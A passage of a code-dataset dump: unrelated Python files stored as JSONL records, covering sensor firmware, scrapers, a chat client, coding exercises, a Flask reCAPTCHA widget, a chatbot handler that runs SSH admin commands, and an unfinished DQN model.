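The conversion in the writeAWG record scales the waveform so its largest magnitude maps to plus or minus 32766 DAC counts, then serializes it as a comma-separated list for the SOURce1:DATA:ARBitrary:DAC command. A standalone sketch of just that conversion, with no instrument required:

# Volts -> DAC-level conversion used before sending the arb waveform.
import numpy as np

signal = np.sin(np.linspace(0, 2 * np.pi, 8))        # example waveform in volts
myrange = max(abs(signal.max()), abs(signal.min()))  # largest excursion
dac = np.round(signal * 32766 / myrange).astype(int)
payload = ",".join(str(v) for v in dac)              # appended to the SCPI command
print(payload)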
'run' method of the '{}' MySqlOperator was not implemented\".format(self.id))\n return\n\n @abc.abstractmethod\n def get_results(self):\n self.hook = QuboleHook(*self.args, **self.kwargs)\n self.hook.execute(context)\n cmd = self.hook.cmd\n\n if cmd is not None:\n query_result_buffer = StringIO()\n cmd.get_results(fp=query_result_buffer, inline=True)\n query_result = query_result_buffer.getvalue().strip()\n query_result_buffer.close()\n row_list = filter(None, query_result.split('\\r\\n'))\n return row_list\n","sub_path":"conf_demo/dags/demo_operators.py","file_name":"demo_operators.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"244255534","text":"from functions import *\nimport argparse\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='Takes data from QC and creates stacked bar plots')\n parser.add_argument('--inputfile', type=str,\n default='~/Desktop/datafile.csv',\n help='Input file name, including directory')\n parser.add_argument('--htmlfile', type=str, default='dehost_report.html',\n help='File name for HTML file')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = parse_args()\n df = pd.read_csv(args.inputfile)\n df2 = read_data(df)\n html = create_html_table(df, df2)\n fig = create_subplots(df2)\n\n write_html_file(args, df2, fig, html)","sub_path":"dehost_report.py","file_name":"dehost_report.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"310741681","text":"\"\"\"\nBryce Martin and David Carlson\n\nECE 4800 - Senior Project\n\nNetwork setup pulled from Digi manual for XBee3 quick setup/start\n\nThis code runs on the Xbee3 acting as a router sending the data it\ncollects to the coordinator. 
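Each probe averages several soil-moisture and light readings, reports them
(together with battery voltage and tilt state) to the coordinator, and then
sleeps between samples.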
Pins that collect data are labeled.\n\"\"\"\nimport xbee\nimport time\nfrom machine import Pin, ADC\n\nSLEEP_DURATION = 60 * 1000 # In seconds between soil samples\nAVERAGE_SAMPLES = 3 # Number of soil samples to be taken before transmission\nLOW_VOLT_THRESH = 2300 # Voltage floor before sleep duration time is increased.\nLOW_LIGHT_THRESH = 500 # Photoresistor ceiling before sleep duration time is increased.\nSLEEP_MULTIPLIER = 3 # Sleep duration will be multiplied by this number if one of the above conditions are met\n\n# Set the identifying string of the radio\nxbee.atcmd(\"NI\", \"Sensor Probe\")\n\n# Configure some basic network settings\nnetwork_settings = {\"AV\": 2, \"EE\": 0, \"ID\": 0xABCD, \"SM\": 6}\n# \"CE\": 0\n\nfor command, value in network_settings.items():\n xbee.atcmd(command, value)\nxbee.atcmd(\"AC\") # Apply changes\ntime.sleep(1)\n\n# Query AI until it reports success\nprint(\"Connecting to network, please wait...\")\nwhile xbee.atcmd(\"AI\") != 0:\n time.sleep_ms(100)\nprint(\"Connected to Network\\n\")\nxbee.transmit(xbee.ADDR_COORDINATOR, \"{'Sector': 1, 'Moisture': 4096, 'Sunlight': 4096, 'Battery': 3333, 'Tilt': 1}\")\n\noperating_network = [\"OI\", \"OP\", \"CH\"]\nprint(\"Operating network parameters:\")\nfor cmd in operating_network:\n print(\"{}: {}\".format(cmd, xbee.atcmd(cmd)))\n# Wait for hub acknowledgement\n\n# Pin Setup\n# Unused Pins are set as outputs to reduce sleep current\nPin(\"D1\", Pin.OUT)\nlight_sensor = ADC(\"D2\")\nmoisture_probe = ADC(\"D3\")\nPin(\"D4\", Pin.OUT)\nPin(\"D6\", Pin.OUT)\nPin(\"D7\", Pin.OUT)\ntilt_switch = Pin(\"D8\", Pin.IN, Pin.PULL_DOWN)\nPin(\"D9\", Pin.OUT)\nsleep_enable = Pin(\"P2\", Pin.IN, Pin.PULL_DOWN)\nmoisture_sensor_power = Pin(\"P5\", Pin.OUT)\ntilt_power = Pin(\"P6\", Pin.OUT) # XCTU Sets this pin Pin.OUT & Pin.Pull_UP for DC Tilt_Switch_Power\nPin(\"P7\", Pin.OUT)\nPin(\"P8\", Pin.OUT)\nPin(\"P9\", Pin.OUT)\n\niteration = 0 # Iteration is used to count number of samples before a packet is sent\nlight_average = 0 # A running total for the average light (Low numbers imply bright)\nmoisture_average = 0 # A running total for the average moisture (Low numbers imply dry)\nbattery = 0 # Battery readings are kept between iterations of the loop for evaluation\nambiance = 0 # Light readings are also kept between loop iterations for evaluation\n\nwhile True:\n # Aggregate data\n tilt_power.on()\n time.sleep_ms(10)\n print(\"PreTilt\"+str(tilt_switch.value()))\n if tilt_switch.value():\n sw_bit_0 = Pin(\"P0\", Pin.IN, Pin.PULL_DOWN)\n sw_bit_1 = Pin(\"P1\", Pin.IN, Pin.PULL_DOWN)\n\n # Evaluate current iteration number\n iteration += 1\n print(iteration)\n if iteration > AVERAGE_SAMPLES:\n moisture = moisture_average / AVERAGE_SAMPLES\n ambiance = light_average / AVERAGE_SAMPLES\n\n # Zero out iteration and running average variables\n iteration = 0\n moisture_average = 0\n light_average = 0\n\n # Evaluate voltage of power supply rail\n battery = xbee.atcmd(\"%V\")\n switch = tilt_switch.value()\n # Evaluate dip switch positions\n zone = 0x3 & (sw_bit_1.value() << 1) | (sw_bit_0.value())\n\n try:\n print(\"Sector: \" + str(zone) +\n \"\\nMoisture: \" + str(moisture) +\n \"\\nSunlight: \" + str(ambiance) +\n \"\\nBattery: \" + str(battery) +\n \"\\nTilt: \" + str(switch) +\n \"\\n\")\n xbee.transmit(xbee.ADDR_COORDINATOR,\n (\"{'Sector': \" + str(zone) +\n \", 'Moisture': \" + str(moisture) +\n \", 'Sunlight': \" + str(ambiance) +\n \", 'Battery': \" + str(battery) +\n \", 'Tilt': \" + str(switch) +\n \"}\")\n )\n except 
Exception as err:\n print(err)\n else:\n print(\"else\")\n # Read data from moisture probe\n moisture_sensor_power.on()\n time.sleep_ms(100)\n moisture_average += moisture_probe.read()\n moisture_sensor_power.off()\n\n # Evaluate ambient light in area\n light_average += light_sensor.read()\n\n sw_bit_0 = Pin(\"P0\", Pin.OUT)\n sw_bit_1 = Pin(\"P1\", Pin.OUT)\n\n # Sleep duration evaluation\n sleep = SLEEP_DURATION\n if ambiance < LOW_LIGHT_THRESH or battery < LOW_VOLT_THRESH:\n sleep = SLEEP_DURATION * SLEEP_MULTIPLIER\n print(sleep)\n # Deep sleep or wait if sleep switch is closed\n tilt_switch = Pin(\"D8\", Pin.OUT)\n if sleep_enable.value():\n sleep_enable = Pin(\"P2\", Pin.OUT)\n xbee.XBee().sleep_now(sleep, pin_wake=False)\n print(\"postWhileConn\")\n while xbee.atcmd(\"AI\") != 0:\n time.sleep_ms(100)\n print(\"postWhileConn\")\n sleep_enable = Pin(\"P2\", Pin.IN, Pin.PULL_DOWN)\n\n else:\n sleep_enable = Pin(\"P2\", Pin.OUT)\n time.sleep_ms(sleep)\n print(\"postWhileConn\")\n while xbee.atcmd(\"AI\") != 0:\n time.sleep_ms(100)\n print(\"postWhileConn\")\n sleep_enable = Pin(\"P2\", Pin.IN, Pin.PULL_DOWN)\n tilt_switch = Pin(\"D8\", Pin.IN, Pin.PULL_DOWN)\n","sub_path":"Garbage_Examples/Xbee3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} {"seq_id":"1028788","text":"import numpy as np\nfrom torch.utils.tensorboard import SummaryWriter\n\n\n# Create the data\nnp.random.seed(123)\nx = np.random.randn(100)\ny = x.cumsum() # cumulative sum of x\n\n# Here we display in TensorBoard the equivalent of the following matplotlib calls.\n# t = np.arange(100)\n# plt.plot(t, x)\n# plt.plot(t, y)\n\n# Specify the log directory with log_dir\nwriter = SummaryWriter(log_dir=\"./logs\")\n\n# Record the values of x and y\nfor i in range(100):\n writer.add_scalar(\"x\", x[i], i)\n writer.add_scalar(\"y\", y[i], i)\n\n# Close the writer\n# writer.flush()\nwriter.close()","sub_path":"src/test_torch2board.py","file_name":"test_torch2board.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} {"seq_id":"267449055","text":"import requests\nfrom bs4 import BeautifulSoup\nnum = 1\nfor i in range(10):\n url = f\"https://movie.douban.com/top250?start={i*25}&filter=\"\n print(url)\n res = requests.get(url)\n soup = BeautifulSoup(res.text,'html.parser')\n list_movie = soup.find_all('div',class_=\"item\")\n\n for movies in list_movie:\n movie = movies.find('a')\n movie_rating_num = movies.find('span',class_=\"rating_num\").text\n movie_name = movies.find('span',class_=\"title\").text\n movie_href = movie['href']\n strs = '\\nNo.: '+str(num) + '\\nTitle: '+movie_name+'\\nLink: '+movie_href+'\\nRating: '+movie_rating_num\n with open('movies_list.txt','a',encoding='utf-8') as f:\n f.write(strs)\n print(strs)\n num = num+1\n","sub_path":"Spider3_1.py","file_name":"Spider3_1.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} {"seq_id":"136619540","text":"from socket import *\r\nfrom _thread import *\r\n# Creating a client socket\r\n\r\n# Variables\r\nHOST = 'localhost' # Server IP address\r\nPORT = 50010\r\nserver = (HOST, PORT)\r\n\r\n# Create the socket\r\nsock = socket(AF_INET, SOCK_STREAM)\r\n\r\n# Establish the connection\r\nsock.connect(server)\r\n\r\ndef get_ip():\r\n s = socket(AF_INET, SOCK_DGRAM)\r\n try:\r\n s.connect(('10.255.255.255', 1))\r\n IP = s.getsockname()[0]\r\n except:\r\n IP = '127.0.0.1'\r\n
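    # Added comment: connecting a UDP socket never sends a packet; it only
    # selects a route, so getsockname() reports the primary local interface IP.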
finally:\r\n s.close()\r\n return IP\r\n\r\ndef reciver():\r\n reply = sock.recv(1024)\r\n print(\"Received: \\n\", repr(reply.decode()))\r\n\r\n\r\ndef sender():\r\n message = input(\"Message: \")\r\n message = get_ip() + ': ' + message + '\\n'\r\n sock.send(message.encode())\r\n \r\n\r\n# Communication loop\r\nwhile True:\r\n start_new_thread(sender,())\r\n start_new_thread(reciver,())\r\n\r\n# Close the connection\r\nsock.close()\r\n","sub_path":"Chat entre clientes y un servidor localhost/clientSocket.py","file_name":"clientSocket.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} {"seq_id":"154187211","text":"#!/bin/python3\n\n\"\"\"\nAuthor: Jeremy Barenholtz\n\nHackerrank ProjectEuler+ Challenge: \nProject Euler #9: Special Pythagorean Triplet\n\"\"\"\n\nimport math\nimport sys\n\n\ndef main():\n squares = [i**2 for i in range(0, 1500)]\n\n t = int(input().strip())\n for a0 in range(t):\n n = int(input().strip())\n print(find_max_triplet(squares, n))\n\n\ndef find_max_triplet(squares: list, n: int) -> int:\n triplets_product = []\n for i in range(1, len(squares)):\n for j in range(i, len(squares)):\n k = math.sqrt(squares[i] + squares[j])\n val = i + j + k\n\n if val > n:\n break\n\n if val == n:\n triplets_product.append(i*j*k)\n break\n\n if not triplets_product:\n return -1\n return int(max(triplets_product))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ProjectEuler+/Python/p9_special_pythagorean_triplet.py","file_name":"p9_special_pythagorean_triplet.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} {"seq_id":"445117827","text":"\nS = [1,2,3,4,5,6,7,8]\nK = 5\nvalue = list()\nresult = list()\ncount = 8\nwhile count > 0:\n\tA = S[count-1]\n\tfor i in range(0,8):\n\t\tif A < S[i]:\n\t\t\tvalue.append(A & S[i])\n\tcount -= 1\nfor i in range(0, len(value)):\n\tif value[i] < K:\n\t\tresult.append(value[i])\n\nprint(max(result))\n\nprint(value)","sub_path":"hackerankSolved/day29BitwiseAnd.py","file_name":"day29BitwiseAnd.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} {"seq_id":"551550098","text":"import json\nimport math\nimport operator\nfrom collections import defaultdict\n\n\nclass testing():\n #score structure:\n #{ 'apple': {'politics': {'politics':score, 'business':score, 'entertainment':score},\n # 'business': {'politics':score, 'business':score, 'entertainment':score},\n # 'entertainment': {'politics':score, 'business':score, 'entertainment':score}\n # },\n # 'facebook': {'politics': {'politics':score, 'business':score, 'entertainment':score},\n # 'business': {'politics':score, 'business':score, 'entertainment':score},\n # 'entertainment': {'politics':score, 'business':score, 'entertainment':score}\n # },\n # ....\n #}\n \n #class_tag structure:\n #{ 'apple': {'politics': tag, 'business': tag, 'entertainment':tag },\n # 'facebook': {'politics': tag, 'business': tag, 'entertainment':tag },\n # ....\n #}\n \n def naiveBayesTesting(self, classNames, trainingDict, testingDict):\n score = defaultdict ( lambda: defaultdict( dict ) )\n for queryname in testingDict.keys():\n for trueclass in classNames:\n for classname in classNames:\n score[queryname][trueclass][classname] = math.log(trainingDict[classname]['class_prob'], 2)\n for word in testingDict[queryname][classname]:\n if word in
trainingDict[classname]['word_prob']:\n score[queryname][trueclass][classname] += math.log(trainingDict[classname]['word_prob'][word],2)\n class_tag = defaultdict ( lambda: defaultdict( float ) )\n for query in score.keys():\n for trueclass in score[query].keys():\n maxClass = max(score[query][trueclass].iteritems(), key=operator.itemgetter(1))[0]\n class_tag[query][trueclass] = maxClass\n \n return score, class_tag\n \n \n #category_dict structure:\n #{'apple':{'politics':[...,...,...],\n # 'business':[...,...,...],\n # 'entertainment':[...,...,...]\n # }\n # 'facebook':{'politics':[...,...,...],\n # 'business':[...,...,...],\n # 'entertainment':[...,...,...]\n # }\n # ...\n #}\n \n \n def extractVocabulary(self, rootPath, classname, testingQueries, stopWordList):\n class_tokens = defaultdict(list)\n for queryname in testingQueries:\n fileName = rootPath + classname + '\\\\' + queryname + '.json'\n f = open(fileName, 'r')\n for line in f.readlines():\n result = json.loads(line.strip('\\n'))\n text = result['description']\n for word in text.split():\n class_tokens[queryname].append(word)\n return class_tokens\n \n def buildTestDict(self, rootPath , classNames, testingQueries, stopWordList):\n testDict = defaultdict (defaultdict)\n for classname in classNames:\n class_tokens = self.extractVocabulary(rootPath, classname, testingQueries, stopWordList)\n for query in testingQueries:\n testDict[query][classname] = class_tokens[query] \n \n return testDict\n \n ","sub_path":"HW3/src/HW3/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"170565276","text":"import json\nfrom Titan.handler_interface import *\n\nfrom Titan.sshclient import SshClient\n\n\nclass HandlerServerManager(HandlerInterface):\n def __init__(self):\n self.context_host = \"HandlerServerManager_host_ctx\"\n self.context_un = \"HandlerServerManager_un_ctx\"\n self.context_pw = \"HandlerServerManager_pw_ctx\"\n self.context_client = \"HandlerServerManager_client_ctx\"\n\n self.verbs = [\"start\", \"stop\" , \"restart\"]\n\n with open(\"sshcommands.json\") as sshcmd_file:\n self.sshcmd_dict = json.load(sshcmd_file)\n sshcmd_file.close()\n with open(\"sshcommands0.json\") as sshcmd0_file:\n self.sshcmd0_dict = json.load(sshcmd0_file)\n sshcmd0_file.close()\n\n def handle(self, message_unit):\n msg=message_unit.get_message().lower()\n ssh_client_instance = message_unit.get_context(self.context_client)\n if msg.startswith(\"cred\"):\n words=msg.split()\n message_unit.set_context(self.context_host, words[1])\n message_unit.set_context(self.context_un, words[2])\n message_unit.set_context(self.context_pw, words[3])\n ssh_client = SshClient()\n ssh_client.connect(words[1], words[2], words[3])\n message_unit.set_context(self.context_client, ssh_client)\n prev_mu = message_unit.get_previous_mu()\n if message_unit.check_context(self.context_host):\n return self.handle(prev_mu)\n return Drop\n\n if \"running\" in msg:\n for entry in self.sshcmd_dict: #check if running\n if entry in msg:\n command = \"controlcenter.sh list | grep -i \" + '\"' + entry + '\"'\n if ssh_client_instance is None:\n return \"Please provide your server details and try again.\"\n return ssh_client_instance.exec(command)\n\n for entry in self.sshcmd0_dict: #run these commands as it is\n if entry in msg:\n print(\"sm checking for \"+entry)\n if ssh_client_instance is None:\n return \"Please provide your server details and try again.\"\n 
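                # Added, hedged note: sshcmd0_dict (loaded from sshcommands0.json)
                # maps a phrase heard in the message to a shell command run verbatim
                # over SSH; e.g. a hypothetical entry {"disk space": "df -h"}.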
return ssh_client_instance.exec(self.sshcmd0_dict.get(entry))\n\n for verb in self.verbs: #start/restart/stop services\n if verb in msg:\n for entry in self.sshcmd_dict:\n if entry in msg:\n print(\"match found\")\n command = self.sshcmd_dict.get(entry) + \" \" + verb\n print(\"executing \" + command)\n if ssh_client_instance is None:\n return \"Please provide your server details and try again.\"\n return ssh_client_instance.exec(command)\n\n\n print(\"server manager passing\")\n return Pass\n\n def get_source(self):\n return \"I've run the command on the server.\"\n\n\n","sub_path":"Titan/handler_server_manager.py","file_name":"handler_server_manager.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"129023974","text":"# -*- coding: utf-8 -*-\n\nfrom flask import current_app, Markup\nfrom werkzeug import url_encode\nfrom flask import json\nfrom .._compat import text_type\nJSONEncoder = json.JSONEncoder\n\ntry:\n from speaklater import _LazyString\n\n class _JSONEncoder(JSONEncoder):\n def default(self, o):\n if isinstance(o, _LazyString):\n return str(o)\n return JSONEncoder.default(self, o)\nexcept:\n _JSONEncoder = JSONEncoder\n\n\nRECAPTCHA_API_SERVER = '//www.google.com/recaptcha/api/'\nRECAPTCHA_HTML = u'''\n\n\n\n'''\n\n__all__ = [\"RecaptchaWidget\"]\n\n\nclass RecaptchaWidget(object):\n\n def recaptcha_html(self, query, options):\n html = current_app.config.get('RECAPTCHA_HTML', RECAPTCHA_HTML)\n server = current_app.config.get(\n 'RECAPTCHA_API_SERVER', RECAPTCHA_API_SERVER\n )\n return Markup(html % dict(\n script_url='%schallenge?%s' % (server, query),\n frame_url='%snoscript?%s' % (server, query),\n options=json.dumps(options, cls=_JSONEncoder)\n ))\n\n def __call__(self, field, error=None, **kwargs):\n \"\"\"Returns the recaptcha input HTML.\"\"\"\n\n try:\n public_key = current_app.config['RECAPTCHA_PUBLIC_KEY']\n except KeyError:\n raise RuntimeError(\"RECAPTCHA_PUBLIC_KEY config not set\")\n query_options = dict(k=public_key)\n\n if field.recaptcha_error is not None:\n query_options['error'] = text_type(field.recaptcha_error)\n\n query = url_encode(query_options)\n\n _ = field.gettext\n\n options = {\n 'theme': 'clean',\n 'custom_translations': {\n 'audio_challenge': _('Get an audio challenge'),\n 'cant_hear_this': _('Download sound as MP3'),\n 'help_btn': _('Help'),\n 'image_alt_text': _('reCAPTCHA challenge image'),\n 'incorrect_try_again': _('Incorrect. 
Try again.'),\n 'instructions_audio': _('Type what you hear'),\n 'instructions_visual': _('Type the text'),\n 'play_again': _('Play sound again'),\n 'privacy_and_terms': _('Privacy & Terms'),\n 'refresh_btn': _('Get a new challenge'),\n 'visual_challenge': _('Get a visual challenge'),\n }\n }\n\n options.update(current_app.config.get('RECAPTCHA_OPTIONS', {}))\n\n return self.recaptcha_html(query, options)\n","sub_path":"flask/Lib/site-packages/flask_wtf/recaptcha/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"8884325","text":"import random\n\n\nclass attribute():\n def __init__(self, name, level, max):\n self.name = name\n self.level = level\n self.hp = max\n self.max = max\n\n\nclass Hero(attribute):\n def __init__(self, name, level, max, race):\n super().__init__(name, level, max)\n self.race = race\n if self.race == 'human':\n self.Dodge = 0.3\n else:\n self.Dodge = 0.6\n\n def hurt(self, Monster):\n s = random.randint(0, self.level * 10)\n Monster.defense(s)\n\n def defense(self, s):\n lm = random.random()\n if lm > self.Dodge:\n self.hp -= s\n if self.hp > 0:\n print(\"Name:{}\\t受到攻击:{}\\tHP:{}\\tLevel:{}\\t\".format(self.name, s, self.hp, self.level))\n else:\n print(\"Name:{}\\t受到攻击:{}\\tHP:0\\t,阵亡!\".format(self.name, s))\n else:\n print(\"Name:{}\\t躲避了攻击\\tHP:{}\\tLevel:{}\\t\".format(self.name, self.hp, self.level))\n\n def upgrade(self):\n self.level += 1\n self.max = self.max + 10\n self.hp = self.max\n print(\"Name:{}\\t获胜!\\tHP:{}\\tLevel:{}\\t\".format(self.name, self.hp, self.level))\n\n\nclass Monster(attribute):\n def __init__(self, name, level, max):\n super().__init__(name, level, max)\n\n def hurt(self, Hero):\n s = random.randint(0, self.level * 10)\n Hero.defense(s)\n\n def defense(self, s):\n self.hp = self.hp - s\n if self.hp > 0:\n print(\"Name:{}\\t受到攻击:{}\\tHP:{}\\tLevel:{}\\t \".format(self.name, s, self.hp, self.level))\n else:\n print(\"Name:{}\\t受到攻击:{}\\tHP:0\\t阵亡!\\t\".format(self.name, s))\n\n\nclass boss(attribute):\n def __init__(self, name, level, max):\n super().__init__(name, level, max)\n self.shield = 3\n\n def hurt(self, Hero):\n s = random.randint(0, self.level * 10)\n Hero.defense(s)\n\n def defense(self, s):\n self.shield -= 2\n if self.shield >= 0:\n print(\"Name:{}\\t受到攻击:{}\\t护盾-1\\t当前护盾:{}点\".format(self.name, s, self.shield))\n else:\n self.hp = self.hp - s\n if self.hp > 0:\n print(\"Name:{}\\t受到攻击:{}\\tHP:{}\\t\".format(self.name, s, self.hp))\n else:\n print(\"Name:{}\\t受到攻击:{}\\tHP:0\\t阵亡!\".format(self.name, s))\n\n\ndef main():\n a = random.random()\n if a >= 0.5:\n hero = Hero(\"人类\", 1, 35, 'human')\n else:\n hero = Hero(\"精灵\", 1, 25, 'spirit')\n m1 = Monster(\"怪兽1\", 1, 30)\n m2 = Monster(\"怪兽2\", 2, 50)\n m3 = boss(\"BOSS\", 3, 80)\n mo = [m1, m2, m3]\n time = 1\n while True:\n print('-' * 15, \"第{}回合\".format(time), '-' * 15)\n hero.hurt(mo[0])\n if mo[0].hp > 0:\n mo[0].hurt(hero)\n else:\n hero.upgrade()\n del mo[0]\n time += 1\n\n if len(mo) == 0:\n print(\"英雄Win!\")\n break\n elif hero.hp <= 0:\n print(\"英雄Lose!\")\n break\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"HW9/Group11/hw9_1720325.py","file_name":"hw9_1720325.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"3306679","text":"#!/usr/bin/env python3\n\nimport collections\nfrom typing import Deque, List, Union\n\nimport 
errors\n\n\nAtom = Union[str, int]\nExpression = Union[Atom, List]\n\n\ndef tokenize(source: str) -> Deque[str]:\n spaced = source.replace('(', ' ( ').replace(')', ' ) ')\n return collections.deque(spaced.split())\n\n\ndef parse_atom(token: str) -> Atom:\n if token[0] == '+':\n return token\n try:\n return int(token)\n except ValueError:\n return token\n\n\ndef parse_exp(tokens: Deque[str]) -> Expression:\n head = tokens.popleft()\n if head == '(':\n ast = []\n while tokens and tokens[0] != ')':\n ast.append(parse_exp(tokens))\n if not tokens:\n raise errors.UnexpectedEndOfSource()\n tokens.popleft() # discard ')'\n return ast\n elif head == ')':\n raise errors.UnexpectedCloseParen()\n else:\n return parse_atom(head)\n\n\nif __name__ == '__main__':\n import sys\n print(parse_exp(tokenize(sys.stdin.read())))\n","sub_path":"SubPascal/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"435663373","text":"import turtle\r\nimport pandas\r\n\r\nscreen = turtle.Screen()\r\nscreen.title(\"states Quiz\")\r\nimage = \"blank_states_img.gif\"\r\nscreen.addshape(image)\r\nturtle.shape(image)\r\n\r\ndata = pandas.read_csv(\"50_states.csv\")\r\n\r\nall_states = data.state.to_list()\r\nguessed_states = []\r\nwhile len(guessed_states) < 28:\r\n\r\n answer_states = screen.textinput(\r\n title=f\"{len(guessed_states)}/50 States Correct\", prompt=\"whats your state\").title()\r\n if answer_states == \"Exit\":\r\n missing_states = []\r\n for state in all_states:\r\n if state not in guessed_states:\r\n missing_states.append(state)\r\n new_data = pandas.DataFrame(missing_states)\r\n new_data.to_csv(\"states_to_learn.csv\")\r\n break\r\n\r\n\r\n if answer_states in all_states:\r\n guessed_states.append(answer_states)\r\n t = turtle.Turtle()\r\n t.hideturtle()\r\n t.penup()\r\n state_data = data[data.state == answer_states]\r\n t.goto(int(state_data.x), int(state_data.y))\r\n t.write(answer_states)\r\n","sub_path":"US game/US_states_quiz.py","file_name":"US_states_quiz.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"79867743","text":"import sys\nimport random\n\ndef fast_count_segments(starts, ends, points):\n\n cnt = [0] * len(points)\n runningcount = 0\n tempArr = []\n\n for val in starts:\n tempArr.append([val, \"l\"])\n \n for val in ends:\n tempArr.append([val, \"r\"])\n\n for i, val in enumerate(points):\n tempArr.append([val, \"p\", i])\n\n tempArr.sort()\n\n for i in range(len(tempArr)):\n\n obtainVal = tempArr[i][1]\n\n if obtainVal == \"l\":\n runningcount += 1\n elif obtainVal == \"r\":\n runningcount -= 1\n else:\n cnt[tempArr[i][2]] = runningcount\n\n return cnt\n\ndef naive_count_segments(starts, ends, points):\n cnt = [0] * len(points)\n for i in range(len(points)):\n for j in range(len(starts)):\n if starts[j] <= points[i] <= ends[j]:\n cnt[i] += 1\n return cnt\n\n\nif __name__ == \"__main__\":\n input = sys.stdin.read()\n data = list(map(int, input.split()))\n\n\n segments = data[0]\n points = data[1]\n\n starts = data[2:2 * segments + 2:2]\n ends = data[3:2 * segments + 2:2]\n points = data[2 * segments + 2:]\n\n #use fast_count_segments\n #cnt = naive_count_segments(starts, ends, points)\n cnt = fast_count_segments(starts,ends,points)\n \n print(*cnt, sep=' 
')\n","sub_path":"OrganiseLottery.py","file_name":"OrganiseLottery.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"579901251","text":"from sqlalchemy_utils import analyze\nfrom tests import TestCase\n\n\nclass TestAnalyzeWithPostgres(TestCase):\n dns = 'postgres://postgres@localhost/sqlalchemy_utils_test'\n\n def test_runtime(self):\n query = self.session.query(self.Article)\n assert analyze(self.connection, query).runtime\n\n def test_node_types_with_join(self):\n query = (\n self.session.query(self.Article)\n .join(self.Article.category)\n )\n analysis = analyze(self.connection, query)\n assert analysis.node_types == [\n u'Hash Join', u'Seq Scan', u'Hash', u'Seq Scan'\n ]\n\n def test_node_types_with_index_only_scan(self):\n query = (\n self.session.query(self.Article.name)\n .order_by(self.Article.name)\n .limit(10)\n )\n analysis = analyze(self.connection, query)\n assert analysis.node_types == [u'Limit', u'Index Only Scan']\n","sub_path":"tests/functions/test_analyze.py","file_name":"test_analyze.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"223864457","text":"import os, os.path\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport math\nimport itertools\nimport tensorflow as tf\nfrom collections import deque\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.layers import Dense, Conv1D, MaxPooling1D, Flatten, concatenate, Conv2D, MaxPooling2D\n#config = tf.compat.v1.ConfigProto(device_count={'GPU':1})\n#sess = tf.compat.v1.Session(config=config) \n# CUDA_VISIBLE_DEVICES=\"\"\n\nclass DQN_CNNDNN(tf.keras.Model):\n def __init__(self, state_size, selected_size, remain_size, loading_size, output_size):\n super(DQN_CNNDNN, self).__init__()\n self.case_cnn1 = Conv2D(filters=5, kernel_size=3, activation='relu', padding=\"valid\", input_shape = state_size)\n self.case_dnn1 = Dense(32, activation='relu')\n # location - selected boxes\n self.sel_cnn1 = Conv2D(filters=5, kernel_size=3, activation='relu', padding=\"valid\", input_shape = selected_size)\n self.sel_dnn1 = Dense(32, activation='relu')\n # size - remain boxes\n self.r_cnn1 = Conv2D(filters=8, kernel_size=3, activation='relu', padding=\"valid\", input_shape = remain_size )\n self.r_dnn1 = Dense(64, activation='relu')\n # size - selected boxes\n self.l_cnn1 = Conv2D(filters=5, kernel_size=(1,3), activation='relu', padding=\"valid\", input_shape = loading_size )\n self.l_dnn1 = Dense(32, activation='relu')\n # all\n #n_ch = state_size[-1] + selected_size[-1] + remain_size[-1] + loading_size[-1] \n #self.a_cnn1 = Conv2D(filters=8, kernel_size=3, activation='relu', padding=\"valid\", input_shape = state_size[:-1]+(n_ch,))\n #self.a_cnn1 = Conv2D(filters=8, kernel_size=3, activation='relu', padding=\"valid\")\n #self.a_dnn1 = Dense(32, activation='relu')\n # merge \n self.fc1 = Dense(256, activation='relu')\n self.fc2 = Dense(128, activation='relu')\n if output_size > 1: #DDQN\n self.fc_out = Dense(output_size, activation='softmax')\n else:\n self.fc_out = Dense(output_size)\n\n def call(self, cb_list):\n c, s, r,l = cb_list[0], cb_list[1], cb_list[2], cb_list[3]\n #c, s, r = cb_list[0], cb_list[1], cb_list[2]\n ### case\n c = self.case_cnn1(c)\n c = MaxPooling2D(pool_size=(2, 2))(c)\n c = Flatten()(c)\n c = self.case_dnn1(c)\n ### location - selected 